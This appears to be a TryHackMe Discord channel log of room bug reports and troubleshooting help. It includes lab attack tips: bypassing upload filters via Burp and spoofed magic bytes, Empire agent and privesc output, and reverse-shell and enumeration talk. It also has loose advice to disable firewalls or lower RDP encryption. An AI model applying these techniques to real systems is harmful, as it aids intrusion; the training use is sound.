The problem is after compiled the code to get root access because when I try to execute using ./
I'm receiving the following error in the TryHackme machine:

./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)

nfs is the name of the executable that I'm trying to run to get the root access.

How can I solve this?

Thank you

Thanks for reporting this. The room johntheripperbasics is the correct room, we did some updates and one of those was changing the room name. MIssed updating this link in the hasing basics room. Thanks!

Gave +1 Rep to @cloud drum (current: #1538 - 2)

thanks, fixed.

Gave +1 Rep to @golden roost (current: #2329 - 1)

https://tryhackme.com/r/room/uploadvulns
Not sure if this is already known, but even though I have access to the boxes for 2 hours they seem to become unresponsive to file uploads after about 40 minutes. I've seen this reported online before, and restarting the box would always fix it

hello excuse me i can't finish "defensive security intro" i finished capturing the flag but the page doesn't close otherwise i can't find the words for task 1

anyone here can talk about virus codes?

Such discussion are reserved for our advanced channels

seem like they are locked

If you read the link, it will tell you how to get access.

how would this website know my level on THM?

You verify with the bot.

Hi
in this room (https://tryhackme.com/r/room/postexploit) I can't pass the 3rd question I get everytime this error trying some different version bot in kali and windows but the results were same

how can I send the image I can't
The error: imcompatible collector. in BloodHound

In the CAPA basics room ( https://tryhackme.com/r/room/capabasics )task 3 it says The static field tells us how CAPA performed its analysis on the file. I would assume the *static * should be changed to analysis because of the below terminal block

https://tryhackme.com/r/room/phishingemails2rytmuv
Task 3: For the right answer you need to put xxxx[.]xxx for the right answer. Shouldn't it be just xxxx.xxx?

Not as you need to defang it.

make sense. Than its would be really good if its would be in the text. The question ist just for the URL.

It's in the question

Defang the URL?

Yes.

ahhhh okey thanks 😅

Gave +1 Rep to @quaint sparrow (current: #1 - 2930)

hey bro don't refer from invoice.html refer from chall description question bug may be

Hi guys. I've seen a small mistake in the room "Nmap: The basics" task 3. It's written "By design, TCP has 65,535 ports, and the same applies to UDP". The exact number is 65,536, from 0 to 65,535

You can vote to reset once every hour I think.

You'll need to verify your account to be able to post images and screenshots.

@hollow tulip

Hi,
Please, did you eventually figure this out?
I'm having sort of a similar problem. Not the same error, but I'm not getting a reverse shell either.

Hi, I am having an issue with the room "Splunk: Dashboard and Reports". The Machine does not run the Splunk app I need to use for the room. Instead, I have the message "Welcome to nginx! if you see this page, the nginx server is successfully installed and working. Further configuration is required .... "

Does the room give a port?

The room gives this "Before moving forward, please start the attached VM by clicking the Start Machine button on the top right corner. Once the IP address is visible, you can use the URL: http://LAB_WEB_URL.p.thmlabs.com to access the Splunk instance. It might take 3-5 minutes for the Splunk instance to start. A VPN connection is not needed to access the Splunk instances."

Do you start the machine?

It was when I tried to connect to the splunk instance

I have the screenshot but it seems I cannot send pictures in this conversation

You need to verify

Here is the screenshot

replace the dots in the IP with dashes

i.e. 10-10-33-58.p.thmlabs.com

It works thanks ! And sorry for the trouble, the error was mine

No problem no trouble was made!:)

help me :<

Hello, what do you need help with?

js essentials task 5 is kinda wrong

Why can't I post photos here?

u need to verify your account with a discord bot

I just finished it right away

Hey folks, noticed a double negative that could be rephrased. In Security Principles room. "If you doubt that your credit card information will be disclosed to an untrusted party, you will most likely refrain from continuing with the transaction." Should read "If you believe that your credit card information will be disclosed to an untrusted party, you will most likely refrain from continuing with the transaction." Thanks for this excellent resource and we appreciate your work strategos and team.

@last loom I am currently doing, Linux Forensics room, unable to ssh into target machine saying "Public Key Denied"
can you check this issue?

Thanks for information

Gave +1 Rep to @unborn pulsar (current: #11 - 707)

I am currently doing the following room.
https://tryhackme.com/r/room/shellsoverview

At Task 8 - Practical Task i cant Access the three URLs to the Webapplications.
Its not working from my Kali and dont work in the Attack Box too :/

The Webserver Ports should be 8080, 8081, 8082 but my nmap scan shows only the following open ports

SYN Stealth Scan Timing: About 55.88% done; ETC: 19:48 (0:00:49 remaining)
Nmap scan report for 10.10.132.221
Host is up (0.058s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp filtered domain
80/tcp open http

i restart the Machine already and wait up to 30 Minutes

I would double check nmap command so i make sure it includes full port range with nmap -p- 10.10.132.221 as it will scan every port to see if web apps are accessible on 8080 8081 8082, if you got access check for any firewall blockage on the ports with sudo iptables -L

Or you know the ports, you can just do -p 8080 8081 8082

Either that yeah, since he knows them directly

They shouldn't be filtered, as then services won't run on those ports or something is preventing access

ok i restart the VM and will check it but i never got any problems since that

┌──(kali㉿kali)-[~/Downloads/]
└─$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

┌──(kali㉿kali)-[~/Downloads/]
└─$ sudo nmap -p 8080,8081,8082 -sS 10.10.74.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 20:51 CET
Nmap scan report for 10.10.74.123
Host is up (0.054s latency).

PORT STATE SERVICE
8080/tcp open http-proxy
8081/tcp open blackice-icecap
8082/tcp open blackice-alerts

Okay now i feel stupid
Now it works in my browser too
Idk
Thanks for the help anyways 😄

Gave +1 Rep to @edgy jay (current: #2332 - 1)

Hello, I would like to report some bugs. In the room Blaster the second last question (Task 4) is deprecated by metasploit and can't be solved if there is no proficiency with the framework. Also in the first answer of Task 3 the information can't be accessed. I know the answer is in the Suggestion box but in the rdp machine the answer couldn't be found. Thx

is the box for the room "Trooper" broken?

Good evening, I am trying to start a virtual machine to complete the room, but it keeps telling me that the Guacamole server is unavailable and attempts to reconnect without success. Any solution? https://tryhackme.com/r/room/linuxfundamentalspart1

You can try restart the room

What issue are you having

Can you verify your account and share a screenshot of it?

@willow notch

@hazy tiger

Hello, can I assist you with something as Jabba may be busy

Hello, I need you to help me verify my account. I followed the instructions but TryHackMe is too slow. I can't send photos to chat rooms.

Wdym slow?

It's instant.

Are you using /verify?

I verified it with my phone number last night but it still won't let me send photos. This afternoon I followed the link that BOT sent me but it seems like no one has verified it for me.

You need to get your discord token from your profile and use that with the bot.

Phone verification is different to role synch

This afternoon I used the token but still no one verified me. I did exactly as instructed!

I sent it to BOT but waiting too long.

Can you DM me the screenshot.

It's not manually done on our end

I can't send you pictures via Discord. Or can I try messaging you privately?

I tried all anydesk expoti, 0-3, none of them worked, I also tried the tools on the internet, but I didn't get a response, can you check it, moderators?

https://tryhackme.com/r/room/annie

@quaint sparrow

hi

The answer is not up-to-date for room 'Web Enumeration' https://tryhackme.com/r/room/webenumerationv2 task 12

https://tryhackme.com/r/room/passwordattacks | Task 3 | https://wiki.skullsecurity.org/index.php?title=Passwords - Link for weak passwords

Help me

Click that button

It took me a whole week

Now you need to follow along with that static site to get the flag.

Let me research again to see what the answer is

Have you tried posting this on #room-help first? Or checked the options you have supplied msf?

I tried all the steps, I think there is no problem, try to solve it if you want, the logic is easy.

It's a 30-minute ctf, but because it was buggy, I tried for 3 hours and didn't get a response 😄

did someone find something in whiterose?

nope

The Breakme room has been very slow, with multiple logins over multiple days. Takes two minutes to complete a POST request to John's PHP server, for instance.

I hope I didn't mess things up

In JavaScript Essentials, can an admin please correct one of the answers?

Answer in the questionnaire is ||3||.

But in the code you are supposed to review it is ||5||.

I even tested out the html ||and the alert appeared 5 times.||

I can confirm you're wrong and that its not a bug 😄

Gave +1 Rep to @grizzled burrow (current: #200 - 34)

small hint: the black things are terminals not images. For further help please ask inside #room-help

its incorrect on the website and hasn't been fixed yet for whatever reason

Seeing if a THM admin can fix, that's all. Figure 'bug' was closest to 'fix the answer', if not, I'm not going to lose sleep over it, trying to help more of the junior folks who may get confused at a random answer vs what it should be.

yea I'm aware

has been posted in this room several times now

is it really a bug...

can't solve it

why can't you solve it?

In the pic
In the engine...page page there is ip address ... If you hover over it will turn red... Then it's is suspicious id address....
And I wrote the IP address in 2nd page but it says it is wrong.... I tried may time....
But can't solve it

Send a screenshot

u need to verify first

@fallow turtle

Just tried it, works just fine

so you either have the wrong IP or copied it wrong

Hey, I was doing the "CyberChef: The Basics" room (https://tryhackme.com/r/room/cyberchefbasics) and found a bug in Task 6 question 1. It asks "Using the file you downloaded in Task 5, which IP starts and ends with "10"?", the correct answer should be "||10.10.2.10||" but the answer field is expecting 3 digits for the last octet. The question itself even mentioned the IP should end in 10.

you should still be able to solve the task, since it autofills the last digit (still a bug, you're correct)

yea i was able to solve it but wanted to report it nonetheless

it is working now

Is there a problem with "Island Orchestration" room?

during portscan nothing shows except the SSH port.

Sorry for the confusion. I thought we had this issue fixed previously but seems not. Its corrected now,

What's the right place to report a room using a dead external source?

This channel is prefect. 🙂

https://tryhackme.com/r/room/owasptop102021 references https://crackstation.net to solve the "Cryptographic Failures" section.
At least for me, the site fails with an SSL Unsupported cipher (ironically)
I used John the ripper to work around it but likely should solve it another way (or get them to fix the site.

Crackstation is up.

What sort of network are you on?

Tried from Chrome on my windows 10 work laptop and it fails. But I just tried from an Ubuntu testing box and it works in firefox. So it's likely some policy applied on my side. 🤦‍♂️

Are you on your home network?

Home network, but work laptop has usual corporate security policies.

Yeah, it will be your work laptop.

Considering how many times it's come up before, I was slow figuring that out. What messed me up was I tried testing it from the Attack Box vm.....which doesn't have internet access 🤦‍♂️

Sorry to bother you. Thanks!

Gave +1 Rep to @quaint sparrow (current: #1 - 2950)

It's no worries, you had a concern and we solved it. 🙂

is there any problem on powershell room?

not really a bug, but i found a small typo in a answer in the Mitre room. https://tryhackme.com/r/room/mitre
What are the data sources for Detection? (format: source1,source2,source3 with no spaces after commas)

One of the answers is spelled 'Nework Traffic'

Flag can only be obtained when requesting the site using it's IP address, and not the domain name. This is task 4 on the Gobuster Basics room. (https://tryhackme.com/r/room/gobusterthebasics)

hey guys can someone give me permission to upload photos

uum should that not be using the /etc/hosts file to set the domain name instead of assuming the target machine runs a dns server that can be used??? because quite sure there is no running dns server on the target and hence it is not resolving

Here are the environment setup instructions for the task

nmap shows response on 53

huh

Gobuster: The Basics
https://tryhackme.com/r/room/gobusterthebasics
In task 6's vhost flag table, -d isn't a valid short flag in the gobuster version 3.6 in the AttackBox. The long one works just fine

There's a successful resolution in the screenshot you replied to...

Hi there I'm in this yara room and when I open nano and enter the snippet nothing happens. I think something is supposed to happen. Am i right?

And it wont start a web server using python in linux 3 room even though the command is right

the link in room "SQL Injection Lab" redirects to machine_ip:5000

Apologies if this is the wrong place for this but I'm trying to complete the Red Teaming pathway and the only room I've had any issues with is Exploiting Active Directory. For some reason, I cannot get the room to even start - it just pops up an error saying 'Uh-no! Failed to start the network'. I reached out to THM support via the link on the page and haven't really gotten anywhere with the person helping me. At first I thought it might be one of the rooms that requires a streak but I've built up various streaks (3, 5, 7) and still can't start the room. Have you guys seen this?

Hi

I need help I im stuck with

with what?

looks like any room that requires its own network access isn't starting up.

the network in https://tryhackme.com/r/room/redteamcapstonechallenge isn't starting up

same thing with https://tryhackme.com/r/room/hololive

i just submitted a bug report about it. hopefully it gets addressed soon.

Did you state the subnets?

Thank you @vestal spade I had already completed the others so I didn’t realize they too were broken

Gave +1 Rep to @vestal spade (current: #1548 - 2)

Can someone help me please.. I’m having in issue with upload file in the jewel challenge..
I can intercept and everything but when I try to upload the file when click on “select and upload file “ nothing happen

You can use burp suite to intercept upload process, by capturing js file you will be able to locate and remove client side checks that are blocking uploads

Don't forget to change headers to match what the server expects, file content should be able to start with appropriate magic number for the file type, it's often hex editor

hi someone know what happend here?

its a roombug or im not doing good, i cant know what happend

change the header of the file for ff d8 ff ee intercept before update file and remove the Js scripts. I cannot find the file and i cannot upload anymore it gave me 500 error message

File extension must match this header, if the server performs strict MIME validation it will reject files that don't conform to some expected formats. If you want to remove JS validations you must make sure server side checks are bypassed

If this doesn't fix it you might want to consider different payloads tbh

Ok thank you.. Probably the extension a the header were not the same.. I will try

Gave +1 Rep to @edgy jay (current: #591 - 8)

There seems to be a typo in the second command of Task 5 (OpenVAS) in the following room: https://tryhackme.com/r/room/vulnerabilityscanneroverview

The command reads:
sudo docker run -d -p 443:443 –name openvas mikesplain/openvas

Where it should read:
sudo docker run -d -p 443:443 --name openvas mikesplain/openvas

The chars before "name" should be a double dash. Running the command as is gives "docker: invalid reference format." error.

sudo docker run -d -p 443:443 --name openvas mikesplain/openvas

Does this work?

Yes

I had to do it again the magic number was not working I had to comment the script “check magic number “ and its work now thanks

Gave +1 Rep to @edgy jay (current: #468 - 11)

Guys i have this problem with windows vm machines in all the rooms, keeps telling me you have been disconnected () any idea how to solve it?.. sometimes i just bypass by using rdp+openvpn. But for machines without credentials like splunk : setting soc lab i cant use the windows machine

Install and configure the VNC server on the virtual machine to access the GUI? Or SSH? To be honest, it would be better to know more about the problem

Hi:) thanks for reporting. I've created a ticket internally 🙌
Edit: this is now fixed

Gave +1 Rep to @stuck anchor (current: #2342 - 1)

No the problem is when i dont have credentials, there is some windows based vms without credentials only split mode… basically when i start and the other half window open the machine keeps reconnecting it never start the windows machine

Disconnections would occur when access policies or idle timeouts are enforced, these settings can trigger a disconnect if session appears idle even if it's locked, you could reduce the frequency but it depends on how are policies configured

Also make sure you configure split tunneling correctly as RDP can be routed differently

1. what network mode is set for the virtual machines. For example, “Bridged” mode can cause problems if the network is not configured correctly. Try switching to “NAT” or “Host-only” and see if the problem persists
2. if the host machine is experiencing network configuration or bandwidth problems. If the host is experiencing outages, this can cause connections to virtual machines to break.
   Sometimes internal firewalls or antivirus can block network connections to virtual machines. Try disabling them.
3. check the virtual network settings in your virtual environment. Make sure the virtual network is configured correctly! Maybe it also needs updates?
4. About the RDP policy, usually Windows virtual machines can have policies configured that block RDP connections if there are no credentials. Check your gpedit.msc settings and make sure that it allows RDP connections without pre-defined credentials.
5. Problem with resources allocated to the virtual machine

are there any logs?

https://tryhackme.com/r/room/mitre question "What platforms does the technique from question #2 affect?" has the wrong answers. It's no longer the answers from https://attack.mitre.org/techniques/T1078/004/ behind, Platforms:

this should be updated i think, luckily i could find the old answers in a tutorial 😛

i guess you understood me wrong, im using browser based vm ..

@edgy jay same as above, im using browser based.. i cant even access the machine to do what you are suggesting 😂 i cant login at alll

Web-based VMs are sensitive to the browser, check if any extensions are interfering

You're on VPN?

not at all.. and the problem i tried all the browsers even on my ipad lol

its not like there is a problem with italian ips? i will try vpn lets see

Rough, try double checking if cookies and JS are enabled, I would also recommend that you clear cache and update your DNS settings to 8.8.8.8 and 8.8.4.4

This should make you avoid potential DNS lookup issues

that possible, i will try it.. im using my isp'ss DNS and its not reliable at all 😄

using vpn works(nah got disconnected). lets try with google's dns

@edgy jay nothing.. windows vm just hates me hahaha

Hello. When I start the Windows machine (titled WINFUN1.1), I connect, but I can just see a black/blue empty window with nothing on it. Is there solution to this? I tried many browsers without extensions.

Set up keep alive timeout and reconnect parameters for each RDP session, i would set MaxIdleTime to lower value and enable keep alive settings

It helped me one time when i adjusted entries

And in case policies are too restrictive for seamless connectivity you can reduce security layer and encryption level

how can i setup these parameters with browser based vm 😄 consider i cant access the vm at all i dont even see the desktop

what am i missing

Remotely with powershell commands, they can modify registry entries related to RDP

but the room doesnt give the credentials

Different remote management tool would sometimes be better option instead of VPN because it can bypass some connection constraints

Request a temporary access to the console

hey team, im doing the passwords room on redteam, trying to download the username_generator but github needs me to sign in, then doesnt let me sign with an authentication error? anyone got a work around. have tried curl and wget to no avail. cheers

Try creating a token with necessary permissions in personal access tokens in settings then use it as your password when prompted during a curl or wget command or if you want to clone using HTTPS

And theres no way to paste in the key into kali given its length right ?

Some terminal settings can limit this, but you can create a text file to store it, that is if pasting directly is cumbersome, or you can just pass it directly git clone https://username:your_long_token@your-git-repo-url

Not a bug, but a typo in Capa: the basics, task 3:
The static field tells us how CAPA performed its analysis on the file.
This needs to be 'analysis', not 'static'

Hello, I'm currently enrolled in SOC level 1 learning path and I'm currently in MITRE room. I just completed the task 8 in the MITRE room however, I found that there's an incorrect answer that has been flagged as a correct answer for one of the questions in task 8. One of the questions is "what platforms does the technique from question #2 affect?" and I found that the answer to this question as " IaaS, Identity Provider, Office Suite, SaaS " from the MITRE attack website and this is the latest version as you can see this from the bottom right corner screenshot. However, when I included this as the answer it flagged it as wrong and I went over google and found from a website called "medium" where it answered as "Azure AD, Google Workspace, IaaS, Office 365, SaaS" and this was flagged as correct in the actual room. However, as you can see from the screen shot on top right corner, the answer from the website is of an old version. Can anyone kindly fix this or properly update the MITRE room ?

Thanks for flagging. I'll get this logged for someone to review it.

Gave +1 Rep to @modern pagoda (current: #2343 - 1)

Attack box freezing or not working at all in open cti room

I don't know if it is a reportable thing - but in the cybersecuity 101 "Crypto Basics" one of the passwords is a swear word. Don't know if someone else has reported it. - Task 3

They are second and third. Very small bug though.

Room :
Windows Local Persistence. Task:6
flag13

In the regedit this key is not present. Even if i create it, the reverse shell doesn't spawn. I already restart the box but still not working

• i have a lot of error when trying to start the vm

fairly sure I found a wrong answer in the cyberchef basics task 5 last question. it asks for the encoded value but the correct answer is not encoded

Not sure if fonts are supposed to be like this, https://tryhackme.com/r/room/wiresharkthebasics

It's superscript

hello i found a bug in the room DLL HIJACKING where i with empire with bas64 coder payload that the with see Cannot connect to CIM server. Access denied how do i solve that gr stefan

WMI service should be running on target machine, I would restart it with net stop winmgmt and net start winmgmt, check if your empire listener has proper configuration to accept incoming connections from payloads, there shouldn't be any errors in listener settings

no there are no errors in listener settings just checked my agent info Session ID VPAUXZS5 Name VPAUXZS5 External IP 10.10.243.212 Internal IP 0.0.0.0 Host Name DESKTOP-E920628 Username DESKTOP-E920628\Sam Listener http Kill Date Working Hours Check In Time 30 minutes ago Last Seen Time a few seconds ago Delay 5 Jitter 0 Lost Limit 60 OS Details [FAILED] Architecture AMD64 Process ID 4296 Process Name powershell Language powershell Language Version 5 Profile /admin/get.php,/news.php,/login/ process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Bug (Maybe) in Networking Concepts Task 2 I chose Layer 5 as an answer and it never told me i was wrong, just auto-corrected me

probably answer tolerance

Sure, but... that seems like it could be roblematic if i ran around believing that i was right and i wasn't. I only noticed because i re-checked my answer

yeah

they probably should change it to just the layer number or the layer name

Definitely would prefer that, but I digress

@glad badger ⬆️

case of answer tolerance causing potential missunderstandings and request to get it changed

I am currently doing
https://tryhackme.com/r/room/owasptop10

The tooltip for OWASP as well as the logo in the first task "Introduction" shows:
Open Web Application Project

"""
The Open Web Application Security Project is a nonprofit foundation focused on understanding web technologies and exploitations and provides resources and tools designed to improve the security of software applications.
"""

The abbrevation in OWASP was renamed to "Open Worldwide Application Security Project".
https://owasp.org/about/

What do you think? Does it make sense to rename it here to be up to date ?

uum think open web application sercurity project is an under project of open worldwide application security project

hello I use the Attackbox in the room DLL HIJACKING and I find a bug the bug is Empire: powershell/privesc/printdemon) > execute [>] Module is not opsec safe, run? [y/N] y [] Tasked XZ657GVE to run TASK_CMD_WAIT [] Agent XZ657GVE tasked with task ID 4 [*] Tasked agent command: Cannot connect to CIM server. Access denied gr stefan

nou de bug is gone

Nah, the acronym was just changed

Backronym at this point

Whether they're now treating their web project as a separate thing, I don't know

thanks for checking muiri

After connecting the software .ovpn to Kali via the configuration file using the openvpn /path command.ovpn remains enabled
2024-11-10 04:28:28 Initialization Sequence Completed
2024-11-10 04:28:28 Data Channel: cipher 'AES-256-CBC', auth 'SHA512', peer-id: 9, compression: 'stub'
2024-11-10 04:28:28 Timers: ping 5, ping-restart 120
. At the same time, if ping is enabled, it sends 4-5 packets, then stops.

Please stop posting the same message accross multiple channels.

ok

Hello everyone, I have a problem on the room: windowslocalpersistence, for the part: Abusing Scheduled Tasks. I've done the task properly but I have an error when revealing the flag.

I made the scheduled task invisible, and launch listener

if shadow recalls correctly all the previous tasks for that room kinda needs to have also been done

yes it is a mess

i reboot the vm 🫠

its ok, thanks for your answer 😉

Gave +1 Rep to @rugged canyon (current: #3 - 1941)

It was renamed:
https://en.wikipedia.org/wiki/OWASP
The NGO voted in favor for this new name:
"""
In February 2023, it was reported by Bil Corry, a OWASP Foundation Global Board of Directors officer,[13] on Twitter[7] that the board had voted for renaming from the Open Web Application Security Project to its current name, replacing Web with Worldwide.
"""

Will get the question/answer reworded. Thanks.

Gave +1 Rep to @fervent tree (current: #2347 - 1)

Isn't this just the anser tolerance kicking in?

It could be misleading if left like that. The only reason i brought it up is because if i didn't double-check my answer, i would've been wrong and wouldn't be aware of it

it looks like you have to leave the room from the options menu button and then rejoin and then the ovpn config file regenerates. i literally just learned about this.

Hello everyone. In Active Reconnaissance > telnet section why can't I telnet into the vm.

root@ip-10-10-7-43:~# telnet 10.10.89.227 80
Trying 10.10.89.227...
Connected to 10.10.89.227.
Escape character is '^]'.
Connection closed by foreign host.
root@ip-10-10-7-43:~#

Just a note: This one, still hasn't been fixed by Nov 12 2024 and contains the wrong/old Sigma Rule Names.

Hi

Does you leave the room as it is? 🙂

hello, I think there is a problem with the room "Shells overview", after successfully establishing a reverse shell, there isn't any flag in the / directory, can anyone confirm ?

You may need to look elsewhere 😉

can you check your private message please ?

https://tryhackme.com/r/room/activerecon
Is the telnet section broken in this room? VPN is connected - ping is going through to the machine

$ nc 10.10.237.159 21
(UNKNOWN) [10.10.237.159] 21 (ftp) : Connection refused

@potent pawn You are attempting to telnet to the ftp port, where did they mention port 21 ?

No?

Have you got the correct machine open?

Task 6 has a different machine to task 5.

Found the error, thanks guys.. shouldn’t try to learn while I’m half asleep

On another note, do some services take some time to boot up in the name section? Sometimes it takes a while for nmap to find the open ports

Sometimes.

Hello everyone ! I think there's a bug for AD Windows rooms: I cannot join the room even if I've already worked on it already. NB: I cannot post an image apparently to explain the situation furthermore.

Hi guys, there might be an issue with task4 of the Network services Room. When accessing the SMB server as an anonymous user, I found out that some files had no content. Is it the case for everyone ? I've been stuck on this task for god knows how long.

Can you send a screenshot of it please so we can take a look on it?

You need to verify your account to be able to post images / screenshots.

@wheat fractal

this is the content of one the .txt files

thank you in advance

I've tried starting a new target machine but that doesn't work.

Try typing more Work then double tap on the tab button right after Work.

this is what it displays

my bad

haven't noticed the spaces though it's obvious.

It worked thanks a lot, and sorry for the inconvenience

Hey, I'am beginner, I want to try to done ctf "All in one" but I think I have bug, when I ping the target machine, every packet lost

It's me ?

(I forgot OpenVPN, probably the cause)

Yup, you need the VPN active outside the network.

It's nothing unusual since most rooms are configured to block ICMP traffic for security, you can use -Pn flag instead or nmap or traceroute

But rooms can specify that ICMP is disabled

he mentioned nc 10.10.237.159 21 ... 21 is ftp i thought? 23 is telnet, 22 is ftp-data .. etc

Although .. maybe i've forgotten things in my old age

The task material asks you to use port 21.

Services can be run on ports that are not their default port.

I saw something about nc to telnet on port 80 , never saw hte 21. my bad

The confusion is they're not on the Telnet task.

The reason you can't open the file the way you are typing it is due to the need of character escaping in Linux wherein you have to type \ before a special character such as a space.

Also, which AD room are you referring to?

Reporting a bug in the Velociraptor room (https://tryhackme.com/r/room/velociraptorhp) - Last question on Task 4 does not accept the correct answer.

In intro to ssrf room at task 2 i give correct request but still the site didn't show the flag yet

Do you have a space at the end?

Yes

Remove the space.

I tried but still remains the same

Can you paste in here what you tried?

Is this a room bug or just a normal thing in thm?
everytime i open the vm it closes like within 5 min ,currently i am on task 5 but to reach task 5 the vm crash / closed like 4-5 time already
Edit : Sometime when starting the vm it auto closes midway

Hi guys, Please i need assistance i just started a course on the tryhackme am in Principles of Security, And am trying to "Vuew Site" to answer the questions but it not displaying.

https://tryhackme.com/r/room/activerecon

Normally port 21 is open and I needed to know the service version when I listened, but the port is not open.

(closed)

in Credentials Harvesting room the link of AD basics redirects to https://tryhackme.com/r/room/activedirectorybasics which shows room is locked
i think it should be https://tryhackme.com/r/room/winadbasics

Thanks for spotting. Will have it fixed.

Gave +1 Rep to @strong loom (current: #1559 - 2)

Hello, in this room : https://tryhackme.com/r/room/dunklematerieptxc9

There is an error in this question : Find the PID (Process ID) of the process which attempted to change the background wallpaper on the victim's machine.

It appears that it's not a Process ID to find but a Thread ID instead. I cross checked and the tool used in this room display the same thing (thread instead of a process)

Hello in this room: https://tryhackme.com/r/room/snappedphishingline
The url for: What is the hidden flag? seems to be missing
Edit: I've tried restarting the room's box the URL is still not found on the server

Same problem here, gotten the same result for the answer but nope not correct. Looks like I was one file off from correct answer, not sure where I went wrong.

Room: https://tryhackme.com/r/room/windowsforensics1
I have || 2021–11–24 18:18:48 || for When was the file 'Changelog.txt' accessed?
its telling me that the answer is wrong but the info in the ntuser.dat says that this is when it was accessed (also 2 separate writeups say this is the answer)
I also have the issue with When was the USB device with the friendly name 'USB' last connected? where I have || 2021–11–24 18:40:06 ||

copy this 2021-11-24 18:18:48

and copy 2021-11-24 18:40:06 for usb answer

That's what I have?

For both

copy from here

and paste

Then tell me the result @zealous hound

i'm so confused?? why does that work

Keyboard layout or something

@violet roost is there a similar fix for this? 👀

so i should paste it into discord `` tag to fix should this happen again?

no i used `` to make it visible it has nothing to do with answer

2021–11–24 18:18:48 uses en dashes (–), which are longer than hyphens

2021-11-24 18:18:48uses hyphens (-), which are standard for ISO date formatting (YYYY-MM-DD). This format is more widely accepted in programming and data processing.

so what did you do to make it the correct character?

My keyboard layout is US and when i type - it is -

yours is – that is longer

you are using wrong url

it is supposed to be kennaroads.buzz/data/Update365/office365/flag.txt no?

well when i click on office365 directory it redirects to URL not found

okay but clicking through the folders doesn't work so unless you know that the txt is called flag.txt you would not find flag.txt

no you have to enumerate the directories

and the hint says there is a txt file ||The flag contains a ".txt" extension and, with some adjustments, should be downloadable from the phishing URL. Look for the flag in every subdomain/directory of the phishing URL.||

yeah || look for ||

you can use -x flag with .txt like gobuster dir -u https://example.com -w /path/to/wordlist.txt -x .txt

enumerate all directories until you find the one with txt file